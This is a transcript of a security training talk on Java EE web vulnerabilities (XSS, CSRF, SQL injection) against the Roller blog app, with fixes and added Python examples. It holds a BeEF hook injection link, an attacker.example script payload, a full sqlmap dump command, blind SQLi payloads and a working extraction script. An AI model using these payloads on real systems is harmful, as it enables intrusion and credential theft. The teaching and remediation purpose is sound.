Java EE Web Security By Example: Frank Kim

Post on 06-May-2015




Learn how to exploit security vulnerabilities that are commonly found in the arsenal of malicious attackers. We won't simply talk about issues like XSS, CSRF and SQL Injection, but will have live demos showing how hackers exploit these potentially devastating defects using freely available tools. You'll see how to hack a real world open source application and explore bugs in commonly used open source frameworks. We also look at the source code and see how to fix these issues using secure coding principles. We will also discuss best practices that can be used to build security into your SDLC. Java developers and architects will learn how to find and fix security issues in their applications before hackers do.

Transcript of Java EE Web Security By Example: Frank Kim

Java EE Web Security By Example

JAX 2012

• Frank Kim
  – Consultant, ThinkSec
  – Author, SANS Secure Coding in Java/JEE
  – SANS Application Security Curriculum Lead

What You Should Know

• Hacking is not hard
• Don't trust any data
  – Assume that your users are evil!

•  Web App Attack Refresher – XSS, CSRF, SQL Injection

•  Testing – Hacking an open source app

•  Secure Coding – Fixing security bugs

Cross-Site Scripting (XSS)

• Occurs when untrusted data is sent back to the browser without validation or output encoding, so the browser treats it as markup or script instead of data

• Types of XSS
  – Stored
  – Reflected
  – Document Object Model (DOM) based

Cross-Site Request Forgery (CSRF)

SQL Injection (SQLi)

• Occurs when dynamic SQL queries are built by concatenating untrusted input into the query string
  – By injecting arbitrary SQL commands, attackers can extend the meaning of the original query
  – Can potentially execute any SQL statement on the database

• Very powerful
  – #1 on CWE/SANS Top 25 Most Dangerous Software Errors
  – #1 on OWASP Top 10

What are We Testing?

• Installation of Roller 3.0
• Fake install of SANS AppSec Street Fighter Blog
• Want to simulate the actions that a real attacker might take
  – There are definitely other avenues of attack
  – We're walking through one attack scenario

Attack Scenario

1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack
   - Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly

Spot the Vuln - XSS

XSS in head.jsp


Testing the "look" Param

• Admin pages include head.jsp
• The param is persistent for the session

XSS Exploitation

• Introducing BeEF – Browser Exploitation Framework
• Uses XSS to hook the victim's browser
  – Log user keystrokes, view browsing history, execute JavaScript, etc
  – Advanced attacks - Metasploit integration, browser exploits, etc

XSS Exploitation Overview

Attacker → Victim

1) Attacker sends a link with the evil BeEF script. The value closes the quoted href attribute that head.jsp builds from the "look" param and injects a script tag in its place:

http://localhost:8080/roller/roller-ui/"><script src=""></script>

2) Victim clicks the evil link

3) Victim's browser runs the hook and sends data to the attacker


Spot the Vuln - CSRF


CSRF in UserAdmin.jsp

• Want to use CSRF to change this field (the field highlighted on the slide)


Spot the Vuln – SQL Injection


SQL Injection in UserServlet


SQL Injection Testing

• UserServlet is vulnerable to SQLi
  http://localhost:8080/roller/roller-ui/authoring/user

(Slide shows the page's response to the test request: "No results")

Exploiting SQL Injection

• Introducing sqlmap
• Tool that automates detection and exploitation of SQL Injection vulns
  – Supports MySQL, Oracle, PostgreSQL, MS SQL Server
  – Supports blind, inband (UNION), and stacked (batched) queries
  – Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc
  – Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc

sqlmap Syntax

• Dump userids and passwords (the session cookie is the authenticated admin's; -p points sqlmap at the injectable parameter, -T/-C name the table and columns to dump)

python sqlmap.py -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID=<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2

SQL Injection Demo

How it Works

sqlmap sends one request per yes/no question. The vulnerable servlet pastes the parameter into a quoted string, so the trailing 'neEy' LIKE 'neEy fragment is completed by the servlet's own closing quote and the statement stays valid. Each request asks whether the character code of one character of the passphrase is above a threshold, and the answer is read from whether the page shows results (the first character is 'i', code 105, so the first two requests return results and the third does not):

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy

Step By Step [0]

SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
  returns ilovethetajmahal

Step By Step [1]

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);
  returns i

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);
  returns l

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);
  returns o

Step By Step [2]

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));
  returns 105

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));
  returns 108

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));
  returns 111

Attack Summary

1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a privilege escalation attack
   - Use escalated privileges to access another feature
3) Use SQL Injection to access the database directly

Data Validation

(Diagram: inbound data flows from the user into the application and on to the data store; outbound data flows from the data store back to the user. A question is asked at each boundary.)

Inbound data: Should I be consuming this?
Outbound data: Should I be emitting this?
Output Encoding

• Encoding
  – Convert characters so they are treated as data and not special characters
• Must escape differently depending on where data is displayed on the page (HTML body, HTML attribute, JavaScript, URL, CSS each have their own special characters)
• OWASP XSS Prevention Cheat Sheet


Fix XSS in head.jsp

• Add URL encoding (the theme name lands in a URL path segment inside an href attribute, so it is encoded for that context)

<%@ page import="org.owasp.esapi.ESAPI" %>
<link rel="stylesheet" type="text/css" media="all"
      href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />
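The following is an added example, not code from the talk or from Roller, that shows why the fix above encodes for the URL context and what the raw value does to the link tag. It is written in Python so it runs stand-alone: render_stylesheet_link, is_safe_theme_name, the "basic" theme name and the hook.js payload are all constructed for the example. It also shows the allowlist check a reviewer would want for a value that can only ever be a theme directory name; that check is stronger than encoding alone because it rejects values like "../admin" that encode cleanly but still mean something else.

```python
import html
import re
from urllib.parse import quote

# Constructed attacker value: closes the href attribute of the <link> tag
# in head.jsp and injects a script tag (the BeEF hook pattern from the talk).
PAYLOAD = '"><script src="http://attacker.example/hook.js"></script>'

# Theme names are directory names: a strict allowlist is the strongest check.
THEME_NAME = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def is_safe_theme_name(theme: str) -> bool:
    """Allowlist validation of the inbound 'look' value (constructed rule)."""
    return THEME_NAME.fullmatch(theme) is not None


def render_stylesheet_link(context_path: str, theme: str, encode: bool) -> str:
    """Build the <link> tag from head.jsp.

    encode=False inserts the theme raw (the vulnerable form).
    encode=True encodes it for a URL path segment first, then for an HTML
    attribute, i.e. inside-out for the two contexts the value sits in.
    """
    if encode:
        # safe="" also encodes "/" so the value cannot escape its path segment;
        # the percent-encoded result has no attribute-special characters left,
        # so the attribute encoding is a no-op here but keeps the discipline.
        theme = html.escape(quote(theme, safe=""), quote=True)
    return (
        '<link rel="stylesheet" type="text/css" media="all" '
        f'href="{context_path}/roller-ui/theme/{theme}/colors.css" />'
    )


def contains_injected_markup(tag: str) -> bool:
    """True if the rendered output holds anything beyond the single <link> element."""
    return "<script" in tag or tag.count("<") != 1


if __name__ == "__main__":
    print(render_stylesheet_link("/roller", PAYLOAD, encode=False))
    print(render_stylesheet_link("/roller", PAYLOAD, encode=True))
    print(is_safe_theme_name("basic"), is_safe_theme_name(PAYLOAD))
```

In the JSP fix above, ESAPI's Encoder.encodeForURL declares a checked EncodingException, so inside a scriptlet it has to be caught or moved into a helper method; and because the value is a directory name, rejecting anything that fails the allowlist before it reaches the page is the check to add alongside the encoding.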

Fix CSRF in Update User Functionality

• UserAdmin.jsp – Add anti-CSRF token as a hidden form field

<input type="hidden" name="<%= CSRFTokenUtil.SESSION_ATTR_KEY %>" value="<%= CSRFTokenUtil.getToken(request.getSession(false)) %>" >

• Struts action that processes the form – Check anti-CSRF token before applying the change

if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
    return mapping.findForward("error");
}
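The talk does not show CSRFTokenUtil itself, so here is an added example (not the talk's code) of the same pattern in Python: one random token per session, emitted as the hidden field, and checked on every state-changing request with a constant-time comparison. Sessions and request parameters are plain dicts standing in for HttpSession and HttpServletRequest; the admin flag on the user record is a constructed stand-in for the field the slide highlights, and TOKEN_ATTR, get_token, is_valid and update_user are names chosen for the example.

```python
import hmac
import secrets

TOKEN_ATTR = "csrf_token"  # session attribute name and hidden-field name (constructed)


def get_token(session: dict) -> str:
    """Return the session's anti-CSRF token, creating it on first use.

    One unpredictable token per session is enough; it must not be derivable
    from anything the attacker's page can already send (cookies, user ids).
    """
    token = session.get(TOKEN_ATTR)
    if token is None:
        token = secrets.token_urlsafe(32)
        session[TOKEN_ATTR] = token
    return token


def hidden_field(session: dict) -> str:
    """The hidden <input> to embed in the user-update form."""
    return f'<input type="hidden" name="{TOKEN_ATTR}" value="{get_token(session)}">'


def is_valid(session, params: dict) -> bool:
    """Check the token submitted with a state-changing request.

    session may be None (getSession(false) returned no session): reject.
    A missing, non-string or mismatched token is rejected. compare_digest
    keeps the comparison constant-time, so the token cannot be recovered
    byte by byte from timing differences.
    """
    if session is None:
        return False
    expected = session.get(TOKEN_ATTR)
    submitted = params.get(TOKEN_ATTR)
    if not expected or not isinstance(submitted, str) or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def update_user(session, params: dict, users: dict) -> bool:
    """Stand-in for the update-user action: applies the change only when the
    CSRF check passes. users maps username -> {"admin": bool} (constructed)."""
    if not is_valid(session, params):
        return False
    users[params["username"]]["admin"] = params.get("admin") == "true"
    return True


if __name__ == "__main__":
    victim, users = {}, {"test": {"admin": False}}
    print(hidden_field(victim))
    # Forged request from the attacker's page: no token, change refused
    print(update_user(victim, {"username": "test", "admin": "true"}, users), users)
```

The token has to be tied to the victim's session: a token the attacker obtained from their own session is rejected, which is what stops an attacker who can log in as a low-privilege user from forging the admin's request.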


Fix SQL Injection in UserServlet

• Use parameterized queries correctly (the input is bound with setString, never concatenated into the SQL text; the % wildcard is now appended by the code rather than supplied by the caller)

    String query;
    PreparedStatement stmt;
    if (startsWith == null || startsWith.equals("")) {
        query = "SELECT username, emailaddress FROM rolleruser";
        stmt = con.prepareStatement(query);
    } else {
        query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";
        stmt = con.prepareStatement(query);
        stmt.setString(1, startsWith + "%");
        stmt.setString(2, startsWith + "%");
    }
    rs = stmt.executeQuery();
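An added example, not code from the talk or from Roller, that serves two of the sections above: it runs the boolean-based blind extraction walked through in "How it Works" and "Step By Step" against the vulnerable query, and then shows the parameterized fix refusing the same payloads. It uses an in-memory SQLite table as a stand-in for rolleruser (the three rows are constructed; only the third passphrase, ilovethetajmahal, is taken from the talk), so the MySQL functions ORD/MID/LIMIT 2,1 are written as SQLite's unicode/substr/LIMIT 1 OFFSET 2. The vulnerable query pastes the parameter into the quoted string and lets the caller supply the wildcard, which matches the startsWith=f%25 test value in the sqlmap command. search_vulnerable, search_fixed, Oracle, bisect and extract_passphrase are names chosen for the example; the fix also escapes % and _ with an ESCAPE clause, a detail the slide's Java does not have, so that a caller cannot turn a prefix search into a match-everything search.

```python
import sqlite3

# Constructed stand-in for Roller's rolleruser table; only the third
# passphrase comes from the talk.
ROWS = [
    ("test", "test@example.com", "s3cret"),
    ("frank", "frank@example.com", "letmein"),
    ("streetfighter", "sf@example.com", "ilovethetajmahal"),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE rolleruser (username TEXT, emailaddress TEXT, passphrase TEXT)")
    con.executemany("INSERT INTO rolleruser VALUES (?, ?, ?)", ROWS)
    return con


def search_vulnerable(con, starts_with: str) -> list:
    """UserServlet as the talk found it: the parameter is pasted into the SQL text."""
    query = ("SELECT username, emailaddress FROM rolleruser "
             f"WHERE username like '{starts_with}' or emailaddress like '{starts_with}'")
    return con.execute(query).fetchall()


def search_fixed(con, starts_with: str) -> list:
    """The parameterized fix. The value is bound, the wildcard is added by code,
    and % / _ / backslash in the input are escaped so they match literally."""
    if not starts_with:
        return con.execute("SELECT username, emailaddress FROM rolleruser").fetchall()
    escaped = (starts_with.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")) + "%"
    return con.execute(
        "SELECT username, emailaddress FROM rolleruser "
        "WHERE username like ? ESCAPE '\\' or emailaddress like ? ESCAPE '\\'",
        (escaped, escaped),
    ).fetchall()


# The subquery from the slides, in SQLite form (third row of the table).
SECRET = "(SELECT passphrase FROM rolleruser LIMIT 1 OFFSET 2)"


class Oracle:
    """One yes/no answer per request: did the vulnerable page show any results?"""

    def __init__(self, con):
        self.con = con
        self.requests = 0

    def ask(self, condition: str) -> bool:
        self.requests += 1
        # The servlet's own closing quote completes the trailing 'neEy' string.
        payload = f"f%' AND {condition} AND 'neEy' LIKE 'neEy"
        return len(search_vulnerable(self.con, payload)) > 0


def bisect(oracle: Oracle, expr: str, hi: int = 127) -> int:
    """Value of expr, found by binary search on 'expr > mid' questions.
    hi=127 assumes ASCII; sqlmap searches a wider range for the same reason."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_passphrase(con) -> tuple:
    """Recover the third user's passphrase one character at a time.
    Returns (passphrase, number of requests sent)."""
    oracle = Oracle(con)
    length = bisect(oracle, f"length({SECRET})")
    chars = [chr(bisect(oracle, f"unicode(substr({SECRET}, {pos}, 1))"))
             for pos in range(1, length + 1)]
    return "".join(chars), oracle.requests


if __name__ == "__main__":
    con = make_db()
    print(extract_passphrase(con))
    print(search_vulnerable(con, "' OR '1'='1"), search_fixed(con, "' OR '1'='1"))
```

Seven requests per character (one binary search over 128 values) is why the sqlmap run in the demo needs only a few hundred requests to dump a column, and why the three requests shown under "How it Works" are consecutive thresholds around the value 105.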

Building Secure Software

Source: Microsoft SDL

